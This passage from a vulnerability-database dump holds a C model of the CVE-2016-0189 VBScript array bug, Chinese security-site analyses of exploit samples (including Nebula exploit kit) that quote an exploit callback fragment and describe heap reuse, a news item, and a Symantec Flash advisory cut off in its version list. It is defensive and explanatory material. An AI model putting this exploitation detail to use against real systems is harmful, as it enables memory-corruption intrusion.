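    sa->cDims = 2;
    sa->fFeatures = 0x880;    /* FADF_VARIANT | FADF_HAVEVARTYPE, the value in the dump */
    sa->cbElements = 0x10;    /* every element is a 16-byte VARIANT */
    sa->pvData = pvData;
    sa->rgsabound[0].cElements = n_right;
    sa->rgsabound[1].cElements = n_left;
}

/* Size in bytes of the element buffer that pvData points to. */
static uint32_t data_size(const SafeArray32 *sa)
{
    uint32_t n = sa->cbElements;
    for (uint16_t d = 0; d < sa->cDims; d++) n *= sa->rgsabound[d].cElements;
    return n;
}

/* Byte offset of element idx (VBScript order, leftmost index first). The leftmost
 * index varies fastest, so A(1,2) of a (0 To 1, 0 To 2) array sits at 0x50.
 * Returns -1 when an index lies outside the bounds stored in the descriptor. */
static int64_t element_offset(const SafeArray32 *sa, const int32_t *idx)
{
    uint64_t off = 0, stride = 1;
    for (uint16_t k = 0; k < sa->cDims; k++) {
        const SafeArrayBound *b = &sa->rgsabound[sa->cDims - 1 - k];
        int64_t rel = (int64_t)idx[k] - b->lLbound;
        if (rel < 0 || (uint64_t)rel >= b->cElements) return -1;
        off += (uint64_t)rel * stride;
        stride *= b->cElements;
    }
    return (int64_t)(off * sa->cbElements);
}

/* The bug, modelled: the offset comes from the bounds that were valid when the
 * indices were evaluated (old), but it is applied to the buffer the callback
 * allocated (new). Returns 1 when the element lies outside the new buffer. */
static int stale_write_escapes(const SafeArray32 *old_sa, const SafeArray32 *new_sa, const int32_t *idx)
{
    int64_t off = element_offset(old_sa, idx);
    if (off < 0) return -1;   /* rejected even by the old bounds */
    return (uint64_t)off + old_sa->cbElements > data_size(new_sa);
}

/* Offset of a(i, j) in ReDim a(0 To n_left-1, 0 To n_right-1). */
static int64_t offset_2d(uint32_t n_left, uint32_t n_right, int32_t i, int32_t j)
{
    SafeArray32 sa; int32_t idx[2] = {i, j};
    make_2d(&sa, n_left, n_right, 0);
    return element_offset(&sa, idx);
}

/* arr4(js_obj, 6) = &h55555555 after my_valueof turned arr4(0, &hFFF) into arr4(2, 0). */
static int arr4_write_escapes(void)
{
    SafeArray32 old_sa, new_sa; int32_t idx[2] = {0, 6};
    make_2d(&old_sa, 1, 0x1000, 0);   /* ReDim arr4(0, &hFFF): 0x10000-byte buffer */
    make_2d(&new_sa, 3, 1, 0);        /* ReDim arr4(2, 0): 0x30-byte buffer */
    return stale_write_escapes(&old_sa, &new_sa, idx);
}

/* Parse the eight dwords printed by dd 052a9fb0 into a descriptor. */
static SafeArray32 from_dump(const uint32_t words[8])
{
    SafeArray32 sa; memcpy(&sa, words, sizeof sa); return sa;
}

int main(void)
{
    const uint32_t dump[8] = {0x08800002, 0x10, 0, 0x0529d640, 1, 0, 1, 0};
    SafeArray32 arr = from_dump(dump);
    printf("A(1,2) offset 0x%llx\n", (long long)offset_2d(2, 3, 1, 2));
    printf("arr4(0,6): stale offset 0x%llx, new buffer 0x30 bytes, escapes=%d\n",
           (long long)offset_2d(1, 0x1000, 0, 6), arr4_write_escapes());
    printf("dump: cDims=%u fFeatures=0x%x pvData=0x%08x size=0x%x\n",
           (unsigned)arr.cDims, (unsigned)arr.fFeatures, (unsigned)arr.pvData,
           (unsigned)data_size(&arr));
    return 0;
}
```

The offset for arr4(0, 6) under the old bounds is 0x60, so a 16-byte VARIANT written there ends 0x40 bytes past the 0x30-byte buffer that replaced pvData; since that buffer was carved out of the holes left by the freed tagSAFEARRAY blocks, the write lands in a neighbouring block of the same size, which is what the loop over UBound(arr2(i), 1) in StartExploit goes looking for.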
\nSub my_valueof() \nReDim arr4(2, 0) ' shrink arr4 while AccessArray is still handling arr4(js_obj, 6) \nEnd Sub \nThe statement above gives arr4(2, 0) a pvData allocation of 0x30 bytes; because of the heap layout prepared earlier, this allocation reuses one of the tagSAFEARRAY blocks that were just freed. \nLet us look more closely at how the statement arr4(js_obj, 6) = &h55555555 executes. \nThe root cause of CVE-2016-0189 is that when AccessArray encounters a JavaScript object as an index it invokes the object's overridden conversion method, which calls back into my_valueof. The exploit's my_valueof redefines arr4 as arr4(2, 0). When the callback returns to AccessArray, the tagSAFEARRAY structure of arr4 and its pvData pointer have already been changed, yet AccessArray carries on and still computes the element address as if it were accessing arr4(0, 6), storing the computed address in a stack variable. \n\n\n**[1] [[2]](<94507_2.htm>) [[3]](<94507_3.htm>) [[4]](<94507_4.htm>) [next](<94507_2.htm>)**\n", "edition": 2, "cvss3": {}, "published": "2019-06-13T00:00:00", "title": "Debugging a suspected original CVE-2016-0189 attack sample - vulnerability warning - the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8174", "CVE-2014-6332", "CVE-2016-0189", "CVE-2018-8373", "CVE-2017-0149"], "modified": "2019-06-13T00:00:00", "id": "MYHACK58:62201994507", "href": "http://www.myhack58.com/Article/html/3/62/2019/94507.htm", 
"cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-04-17T13:23:46", "edition": 2, "description": "1\\. Introduction \nIn recent years the exploit kit (EK) market has seen constant change. In early June 2016 the once-rampant Angler EK disappeared and Neutrino EK quickly filled the void. Less than three months later Neutrino EK also went underground and RIG EK became the most popular exploit kit. At the beginning of March this year RIG faded from view in turn and a new kit, Nebula EK, appeared. \nNebula EK's exploit for CVE-2016-0189 carries some improvements over the exploits used by other kits, so it is analysed in depth here. \nTools used: \n\u2022 IE11 (for debugging the JavaScript) \n\u2022 windbg \nThe Nebula EK landing page contains obfuscated JavaScript. Looking at this code more closely, does it seem familiar? Its obfuscation method is very similar to that of Sundown EK. \nThe page contains two blocks of JavaScript, both obfuscated in the same way. Removing the obfuscation from the first block reveals code that is plainly an exploit for CVE-2016-0189. \nSeveral analyses of CVE-2016-0189 are already available online, for example the one by Theori [1]. These reports, however, do not provide technical detail at the memory level, which leaves the reader knowing what happens but not why. This article uses windbg to examine the memory layout at the moment the vulnerability is exploited, so that the reader gains a deeper understanding of the exploit. \n2\\. Background knowledge for CVE-2016-0189 \nCVE-2016-0189 is a VBScript vulnerability. The VBScript engine code lives in vbscript.dll. \n2.1. VBScript variables \nIn memory a VBScript variable occupies 0x10 bytes; the first two bytes hold the variable type (VARTYPE). The common type values are given in the VARENUM table [2]. \nWe can insert calls to IsEmpty() in the VBScript code and set a breakpoint on vbscript!IsEmpty in windbg to observe the memory [3]. \nFigure 1 debugging VBScript code \nHere 0a560198 is the variable str; its first two bytes, 0008, are the VARTYPE, which according to the table is exactly vbString (VT_BSTR = 8), and offset 0x8 holds the address of the string. \nIt can also be seen that the string is stored as Unicode. \n2.2. VBScript arrays \nA VBScript array is described by the SAFEARRAY structure. \nWhen an array element is accessed, the VBScript engine calls the AccessArray function to compute the element's storage address. \nLet us debug a small test script that declares a two-dimensional array A and reads A(1,2), with a breakpoint on vbscript!AccessArray. \nOn the stack, 0ab04380 is the address of array A. \nThe array elements are stored starting at pvData (0x7dfd130). \nStop at the instruction at vbscript!AccessArray+0x9d (the offset may differ in other versions). \nThis instruction is crucial: it computes the address of element A(1,2). Here esi is the SAFEARRAY address, esi+0c is the pvData field, and eax is the offset of the element relative to pvData. \nWhy is the offset of A(1,2) 0x50? The memory layout of a VBScript array differs from that of C: the elements of A are laid out as A(0,0), A(1,0), A(0,1), A(1,1), A(0,2), A(1,2), with the leftmost index varying fastest, and each element is 0x10 bytes (cbElements). A(1,2) is the sixth element, so its offset is 5 * 0x10 = 0x50. \n2.3. How CVE-2016-0189 works \nThe CVE-2016-0189 bug lies in the code of AccessArray. Let us look at the logic of this function:\n\n**[1] [[2]](<85342_2.htm>) [[3]](<85342_3.htm>) [next](<85342_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-17T00:00:00", "type": "myhack58", "title": "Nebula exploit kit CVE-2016-0189 exploit analysis - exploit warning - the black bar safety net", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2016-0189"], "modified": "2017-04-17T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/85342.htm", "id": "MYHACK58:62201785342", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-09T17:47:57", "edition": 2, "description": "By RecordedFuture a new study suggests that, due to its vulnerability, Flash Player will continue to the global computer at risk, cybercriminals are still looking for the Adobe solutions among the security flaws to the invasion of the computer. This year the exploit kit used by the top 10 vulnerabilities in a total of 6 vulnerabilities from Adobe Flash Player, one of the security vulnerabilities is more than 7 exploit Kit the use. \nInternet Explorer, Windows and Silverlight are also the exploitability of the vulnerability of the target, in the Microsoft browser, find the security vulnerability CVE-2016-0189 is a network for criminals to exploit most of the vulnerabilities. Microsoft IE browser is Magnitude, the Neutrino, the RIG and the Sundown and other exploit kits as an attack target, and the Angler, the Magnitude, the Neutrino, the RIG, the Nuclear Pack and Spartan and other exploit kits are using the Flash Player vulnerability to attack. \nAdobe number for CVE-2015-7645 vulnerability is particularly affected by attack kit developers attention, because it affects not only Windows, but also affecting Mac and Linux systems. It can be used to control an affected system. In addition, this is the Adobe After the introduction of new security mechanisms found after the first zero-day vulnerabilities, and therefore, very quickly by hackers. \nRecordedFuture shows, these software solutions in the presence of all vulnerabilities must as soon as possible by updating the repair, and suggested that if the user does not affect the key business processes, please delete the Affected Software. 
For Internet Explorer users, the company says it is best to consider the Chrome browser, because Google's Project Zero has been active in getting Flash Player vulnerabilities patched in Chrome; Microsoft, for its part, promises extra security through the new Edge browser in Windows 10. \n", "cvss3": {}, "published": "2016-12-09T00:00:00", "type": "myhack58", "title": "Security researchers find that exploit kits favor Flash Player vulnerabilities - vulnerability warning - the black bar safety net", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0189", "CVE-2015-7645"], "modified": "2016-12-09T00:00:00", "id": "MYHACK58:62201681902", "href": "http://www.myhack58.com/Article/html/3/62/2016/81902.htm", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "symantec": [{"lastseen": "2021-06-08T18:45:42", "description": "### Description\n\nAdobe Flash Player and AIR are prone to an unspecified integer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. 
Failed exploit attempts will likely result in denial-of-service conditions.\n\n### Technologies Affected\n\n * Adobe AIR 1.0 \n * Adobe AIR 1.0.1 \n * Adobe AIR 1.0.4990 \n * Adobe AIR 1.0.8.4990 \n * Adobe AIR 1.01 \n * Adobe AIR 1.1 \n * Adobe AIR 1.1.0.5790 \n * Adobe AIR 1.5 \n * Adobe AIR 1.5.0.7220 \n * Adobe AIR 1.5.1 \n * Adobe AIR 1.5.1.8210 \n * Adobe AIR 1.5.2 \n * Adobe AIR 1.5.3 \n * Adobe AIR 1.5.3.9120 \n * Adobe AIR 1.5.3.9130 \n * Adobe AIR 13.0.0.111 \n * Adobe AIR 13.0.0.83 \n * Adobe AIR 14.0.0.110 \n * Adobe AIR 14.0.0.137 \n * Adobe AIR 14.0.0.178 \n * Adobe AIR 14.0.0.179 \n * Adobe AIR 15.0.0.249 \n * Adobe AIR 15.0.0.252 \n * Adobe AIR 15.0.0.293 \n * Adobe AIR 15.0.0.356 \n * Adobe AIR 16.0.0.245 \n * Adobe AIR 16.0.0.272 \n * Adobe AIR 17.0.0.144 \n * Adobe AIR 17.0.0.172 \n * Adobe AIR 18.0.0.143 \n * Adobe AIR 18.0.0.144 \n * Adobe AIR 18.0.0.180 \n * Adobe AIR 18.0.0.199 \n * Adobe AIR 19.0.0.190 \n * Adobe AIR 19.0.0.213 \n * Adobe AIR 19.0.0.241 \n * Adobe AIR 2.0.2 \n * Adobe AIR 2.0.2.12610 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.3.13070 \n * Adobe AIR 2.0.4 \n * Adobe AIR 2.5.0.16600 \n * Adobe AIR 2.5.1 \n * Adobe AIR 2.5.1.17730 \n * Adobe AIR 2.6 \n * Adobe AIR 2.6.0.19120 \n * Adobe AIR 2.6.0.19140 \n * Adobe AIR 2.6.19120 \n * Adobe AIR 2.6.19140 \n * Adobe AIR 2.7 \n * Adobe AIR 2.7.0.1948 \n * Adobe AIR 2.7.0.19480 \n * Adobe AIR 2.7.0.1953 \n * Adobe AIR 2.7.0.19530 \n * Adobe AIR 2.7.1 \n * Adobe AIR 2.7.1.1961 \n * Adobe AIR 2.7.1.19610 \n * Adobe AIR 20.0.0.204 \n * Adobe AIR 3.0 \n * Adobe AIR 3.0.0.408 \n * Adobe AIR 3.0.0.4080 \n * Adobe AIR 3.1.0.485 \n * Adobe AIR 3.1.0.488 \n * Adobe AIR 3.1.0.4880 \n * Adobe AIR 3.2.0.207 \n * Adobe AIR 3.2.0.2070 \n * Adobe AIR 3.2.0.2080 \n * Adobe AIR 3.3.0.3610 \n * Adobe AIR 3.3.0.3650 \n * Adobe AIR 3.3.0.3670 \n * Adobe AIR 3.3.0.3690 \n * Adobe AIR 3.4.0.2540 \n * Adobe AIR 3.4.0.2710 \n * Adobe AIR 3.5.0.1060 \n * Adobe AIR 3.5.0.600 \n * Adobe AIR 3.5.0.880 \n * Adobe 
AIR 3.5.0.890 \n * Adobe AIR 3.6.0.597 \n * Adobe AIR 3.6.0.599 \n * Adobe AIR 3.6.0.6090 \n * Adobe AIR 3.7.0.1530 \n * Adobe AIR 3.7.0.1660 \n * Adobe AIR 3.7.0.1860 \n * Adobe AIR 3.7.0.2090 \n * Adobe AIR 3.7.0.2100 \n * Adobe AIR 3.8.0.1430 \n * Adobe AIR 3.8.0.870 \n * Adobe AIR 3.8.0.910 \n * Adobe AIR 3.9.0.1030 \n * Adobe AIR 3.9.0.1060 \n * Adobe AIR 3.9.0.1210 \n * Adobe AIR 3.9.0.1380 \n * Adobe AIR 4 \n * Adobe AIR 4.0.0.1390 \n * Adobe AIR 4.0.0.1628 \n * Adobe AIR SDK 13.0.0.111 \n * Adobe AIR SDK 13.0.0.83 \n * Adobe AIR SDK 14.0.0.110 \n * Adobe AIR SDK 14.0.0.137 \n * Adobe AIR SDK 14.0.0.178 \n * Adobe AIR SDK 14.0.0.179 \n * Adobe AIR SDK 15.0.0.249 \n * Adobe AIR SDK 15.0.0.302 \n * Adobe AIR SDK 15.0.0.356 \n * Adobe AIR SDK 16.0.0.272 \n * Adobe AIR SDK 17.0.0.144 \n * Adobe AIR SDK 17.0.0.172 \n * Adobe AIR SDK 18.0.0.143 \n * Adobe AIR SDK 18.0.0.144 \n * Adobe AIR SDK 18.0.0.180 \n * Adobe AIR SDK 18.0.0.199 \n * Adobe AIR SDK 19.0.0.190 \n * Adobe AIR SDK 19.0.0.213 \n * Adobe AIR SDK 19.0.0.241 \n * Adobe AIR SDK 20.0.0.204 \n * Adobe AIR SDK 3.9.0.1380 \n * Adobe AIR SDK 4.0.0.1390 \n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12.35 \n * Adobe Flash Player 10.0.12.36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15.3 \n * Adobe Flash Player 10.0.2.54 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45.2 \n * Adobe Flash Player 10.1 \n * Adobe Flash Player 10.1.102.64 \n * Adobe Flash Player 10.1.102.65 \n * Adobe Flash Player 10.1.105.6 \n * Adobe Flash Player 10.1.106.16 \n * Adobe Flash Player 10.1.106.17 \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.52.14 \n * Adobe Flash Player 10.1.52.14.1 \n * Adobe Flash Player 10.1.52.15 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash 
Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.8 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.2.152 \n * Adobe Flash Player 10.2.152.21 \n * Adobe Flash Player 10.2.152.26 \n * Adobe Flash Player 10.2.152.32 \n * Adobe Flash Player 10.2.152.33 \n * Adobe Flash Player 10.2.153.1 \n * Adobe Flash Player 10.2.154.13 \n * Adobe Flash Player 10.2.154.18 \n * Adobe Flash Player 10.2.154.24 \n * Adobe Flash Player 10.2.154.25 \n * Adobe Flash Player 10.2.154.27 \n * Adobe Flash Player 10.2.154.28 \n * Adobe Flash Player 10.2.156.12 \n * Adobe Flash Player 10.2.157.51 \n * Adobe Flash Player 10.2.159.1 \n * Adobe Flash Player 10.3.181.14 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.22 \n * Adobe Flash Player 10.3.181.23 \n * Adobe Flash Player 10.3.181.26 \n * Adobe Flash Player 10.3.181.34 \n * Adobe Flash Player 10.3.183.10 \n * Adobe Flash Player 10.3.183.11 \n * Adobe Flash Player 10.3.183.15 \n * Adobe Flash Player 10.3.183.16 \n * Adobe Flash Player 10.3.183.18 \n * Adobe Flash Player 10.3.183.19 \n * Adobe Flash Player 10.3.183.20 \n * Adobe Flash Player 10.3.183.23 \n * Adobe Flash Player 10.3.183.25 \n * Adobe Flash Player 10.3.183.29 \n * Adobe Flash Player 10.3.183.4 \n * Adobe Flash Player 10.3.183.43 \n * Adobe Flash Player 10.3.183.48 \n * Adobe Flash Player 10.3.183.5 \n * Adobe Flash Player 10.3.183.50 \n * Adobe Flash Player 10.3.183.51 \n * Adobe Flash Player 10.3.183.61 \n * Adobe Flash Player 10.3.183.63 \n * Adobe Flash Player 10.3.183.67 \n * Adobe Flash Player 10.3.183.68 \n * Adobe Flash Player 10.3.183.7 \n * Adobe Flash Player 10.3.183.75 \n * Adobe Flash Player 10.3.183.86 \n * Adobe Flash Player 10.3.185.21 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.23 \n * Adobe Flash Player 10.3.185.24 \n * Adobe Flash Player 10.3.185.25 \n * Adobe Flash Player 10.3.186.2 \n * Adobe Flash 
Player 10.3.186.3 \n * Adobe Flash Player 10.3.186.6 \n * Adobe Flash Player 10.3.186.7 \n * Adobe Flash Player 11 \n * Adobe Flash Player 11.0 \n * Adobe Flash Player 11.0.1.129 \n * Adobe Flash Player 11.0.1.152 \n * Adobe Flash Player 11.0.1.153 \n * Adobe Flash Player 11.0.1.60 \n * Adobe Flash Player 11.0.1.98 \n * Adobe Flash Player 11.1 \n * Adobe Flash Player 11.1.102.228 \n * Adobe Flash Player 11.1.102.55 \n * Adobe Flash Player 11.1.102.59 \n * Adobe Flash Player 11.1.102.62 \n * Adobe Flash Player 11.1.102.63 \n * Adobe Flash Player 11.1.111.10 \n * Adobe Flash Player 11.1.111.44 \n * Adobe Flash Player 11.1.111.5 \n * Adobe Flash Player 11.1.111.50 \n * Adobe Flash Player 11.1.111.54 \n * Adobe Flash Player 11.1.111.6 \n * Adobe Flash Player 11.1.111.64 \n * Adobe Flash Player 11.1.111.7 \n * Adobe Flash Player 11.1.111.73 \n * Adobe Flash Player 11.1.111.8 \n * Adobe Flash Player 11.1.111.9 \n * Adobe Flash Player 11.1.112.61 \n * Adobe Flash Player 11.1.115.11 \n * Adobe Flash Player 11.1.115.34 \n * Adobe Flash Player 11.1.115.48 \n * Adobe Flash Player 11.1.115.54 \n * Adobe Flash Player 11.1.115.58 \n * Adobe Flash Player 11.1.115.59 \n * Adobe Flash Player 11.1.115.6 \n * Adobe Flash Player 11.1.115.63 \n * Adobe Flash Player 11.1.115.69 \n * Adobe Flash Player 11.1.115.7 \n * Adobe Flash Player 11.1.115.8 \n * Adobe Flash Player 11.1.115.81 \n * Adobe Flash Player 11.2.202.160 \n * Adobe Flash Player 11.2.202.197 \n * Adobe Flash Player 11.2.202.221 \n * Adobe Flash Player 11.2.202.223 \n * Adobe Flash Player 11.2.202.228 \n * Adobe Flash Player 11.2.202.229 \n * Adobe Flash Player 11.2.202.233 \n * Adobe Flash Player 11.2.202.235 \n * Adobe Flash Player 11.2.202.236 \n * Adobe Flash Player 11.2.202.238 \n * Adobe Flash Player 11.2.202.243 \n * Adobe Flash Player 11.2.202.251 \n * Adobe Flash Player 11.2.202.258 \n * Adobe Flash Player 11.2.202.261 \n * Adobe Flash Player 11.2.202.262 \n * Adobe Flash Player 
11.2.202.270 \n * Adobe Flash Player 11.2.202.273 \n * Adobe Flash Player 11.2.202.275 \n * Adobe Flash Player 11.2.202.280 \n * Adobe Flash Player 11.2.202.285 \n * Adobe Flash Player 11.2.202.291 \n * Adobe Flash Player 11.2.202.297 \n * Adobe Flash Player 11.2.202.310 \n * Adobe Flash Player 11.2.202.327 \n * Adobe Flash Player 11.2.202.332 \n * Adobe Flash Player 11.2.202.335 \n * Adobe Flash Player 11.2.202.336 \n * Adobe Flash Player 11.2.202.341 \n * Adobe Flash Player 11.2.202.346 \n * Adobe Flash Player 11.2.202.350 \n * Adobe Flash Player 11.2.202.356 \n * Adobe Flash Player 11.2.202.359 \n * Adobe Flash Player 11.2.202.378 \n * Adobe Flash Player 11.2.202.394 \n * Adobe Flash Player 11.2.202.400 \n * Adobe Flash Player 11.2.202.406 \n * Adobe Flash Player 11.2.202.411 \n * Adobe Flash Player 11.2.202.418 \n * Adobe Flash Player 11.2.202.424 \n * Adobe Flash Player 11.2.202.425 \n * Adobe Flash Player 11.2.202.429 \n * Adobe Flash Player 11.2.202.438 \n * Adobe Flash Player 11.2.202.440 \n * Adobe Flash Player 11.2.202.442 \n * Adobe Flash Player 11.2.202.451 \n * Adobe Flash Player 11.2.202.457 \n * Adobe Flash Player 11.2.202.460 \n * Adobe Flash Player 11.2.202.466 \n * Adobe Flash Player 11.2.202.468 \n * Adobe Flash Player 11.2.202.481 \n * Adobe Flash Player 11.2.202.491 \n * Adobe Flash Player 11.2.202.508 \n * Adobe Flash Player 11.2.202.521 \n * Adobe Flash Player 11.2.202.535 \n * Adobe Flash Player 11.2.202.540 \n * Adobe Flash Player 11.2.202.548 \n * Adobe Flash Player 11.2.202.554 \n * Adobe Flash Player 11.2.202.95 \n * Adobe Flash Player 11.3.300.214 \n * Adobe Flash Player 11.3.300.231 \n * Adobe Flash Player 11.3.300.250 \n * Adobe Flash Player 11.3.300.257 \n * Adobe Flash Player 11.3.300.262 \n * Adobe Flash Player 11.3.300.265 \n * Adobe Flash Player 11.3.300.268 \n * Adobe Flash Player 11.3.300.270 \n * Adobe Flash Player 11.3.300.271 \n * Adobe Flash Player 11.3.300.273 \n * Adobe Flash Player 11.3.31.230 \n * Adobe Flash Player 
11.3.378.5 \n * Adobe Flash Player 11.4.400.231 \n * Adobe Flash Player 11.4.402.265 \n * Adobe Flash Player 11.4.402.278 \n * Adobe Flash Player 11.4.402.287 \n * Adobe Flash Player 11.5.500.80 \n * Adobe Flash Player 11.5.502.110 \n * Adobe Flash Player 11.5.502.118 \n * Adobe Flash Player 11.5.502.124 \n * Adobe Flash Player 11.5.502.131 \n * Adobe Flash Player 11.5.502.135 \n * Adobe Flash Player 11.5.502.136 \n * Adobe Flash Player 11.5.502.146 \n * Adobe Flash Player 11.5.502.149 \n * Adobe Flash Player 11.6.602.105 \n * Adobe Flash Player 11.6.602.167 \n * Adobe Flash Player 11.6.602.168 \n * Adobe Flash Player 11.6.602.171 \n * Adobe Flash Player 11.6.602.180 \n * Adobe Flash Player 11.7.700.169 \n * Adobe Flash Player 11.7.700.202 \n * Adobe Flash Player 11.7.700.203 \n * Adobe Flash Player 11.7.700.224 \n * Adobe Flash Player 11.7.700.225 \n * Adobe Flash Player 11.7.700.232 \n * Adobe Flash Player 11.7.700.242 \n * Adobe Flash Player 11.7.700.252 \n * Adobe Flash Player 11.7.700.257 \n * Adobe Flash Player 11.7.700.260 \n * Adobe Flash Player 11.7.700.261 \n * Adobe Flash Player 11.7.700.269 \n * Adobe Flash Player 11.7.700.272 \n * Adobe Flash Player 11.7.700.275 \n * Adobe Flash Player 11.7.700.279 \n * Adobe Flash Player 11.8.800.168 \n * Adobe Flash Player 11.8.800.170 \n * Adobe Flash Player 11.8.800.94 \n * Adobe Flash Player 11.8.800.97 \n * Adobe Flash Player 11.9.900.117 \n * Adobe Flash Player 11.9.900.152 \n * Adobe Flash Player 11.9.900.170 \n * Adobe Flash Player 12 \n * Adobe Flash Player 12.0.0.38 \n * Adobe Flash Player 12.0.0.41 \n * Adobe Flash Player 12.0.0.43 \n * Adobe Flash Player 12.0.0.44 \n * Adobe Flash Player 12.0.0.70 \n * Adobe Flash Player 12.0.0.77 \n * Adobe Flash Player 13.0.0.182 \n * Adobe Flash Player 13.0.0.201 \n * Adobe Flash Player 13.0.0.206 \n * Adobe Flash Player 13.0.0.214 \n * Adobe Flash Player 13.0.0.223 \n * Adobe Flash Player 13.0.0.231 \n * Adobe Flash Player 13.0.0.241 \n * Adobe Flash Player 13.0.0.244 
\n * Adobe Flash Player 13.0.0.250 \n * Adobe Flash Player 13.0.0.252 \n * Adobe Flash Player 13.0.0.258 \n * Adobe Flash Player 13.0.0.259 \n * Adobe Flash Player 13.0.0.260 \n * Adobe Flash Player 13.0.0.262 \n * Adobe Flash Player 13.0.0.264 \n * Adobe Flash Player 13.0.0.269 \n * Adobe Flash Player 13.0.0.277 \n * Adobe Flash Player 13.0.0.281 \n * Adobe Flash Player 13.0.0.289 \n * Adobe Flash Player 13.0.0.292 \n * Adobe Flash Player 13.0.0.296 \n * Adobe Flash Player 13.0.0.302 \n * Adobe Flash Player 13.0.0.309 \n * Adobe Flash Player 14.0.0.125 \n * Adobe Flash Player 14.0.0.145 \n * Adobe Flash Player 14.0.0.176 \n * Adobe Flash Player 14.0.0.177 \n * Adobe Flash Player 14.0.0.179 \n * Adobe Flash Player 15.0.0.152 \n * Adobe Flash Player 15.0.0.189 \n * Adobe Flash Player 15.0.0.223 \n * Adobe Flash Player 15.0.0.239 \n * Adobe Flash Player 15.0.0.242 \n * Adobe Flash Player 15.0.0.246 \n * Adobe Flash Player 16.0.0.234 \n * Adobe Flash Player 16.0.0.235 \n * Adobe Flash Player 16.0.0.257 \n * Adobe Flash Player 16.0.0.287 \n * Adobe Flash Player 16.0.0.291 \n * Adobe Flash Player 16.0.0.296 \n * Adobe Flash Player 16.0.0.305 \n * Adobe Flash Player 17.0.0.134 \n * Adobe Flash Player 17.0.0.169 \n * Adobe Flash Player 17.0.0.188 \n * Adobe Flash Player 18.0.0.143 \n * Adobe Flash Player 18.0.0.160 \n * Adobe Flash Player 18.0.0.161 \n * Adobe Flash Player 18.0.0.194 \n * Adobe Flash Player 18.0.0.203 \n * Adobe Flash Player 18.0.0.204 \n * Adobe Flash Player 18.0.0.209 \n * Adobe Flash Player 18.0.0.232 \n * Adobe Flash Player 18.0.0.233 \n * Adobe Flash Player 18.0.0.241 \n * Adobe Flash Player 18.0.0.252 \n * Adobe Flash Player 18.0.0.255 \n * Adobe Flash Player 18.0.0.261 \n * Adobe Flash Player 18.0.0.268 \n * Adobe Flash Player 19.0.0.185 \n * Adobe Flash Player 19.0.0.207 \n * Adobe Flash Player 19.0.0.226 \n * Adobe Flash Player 19.0.0.245 \n * Adobe Flash Player 2 \n * Adobe Flash Player 20.0.0.228 \n * Adobe Flash Player 20.0.0.235 \n * Adobe 
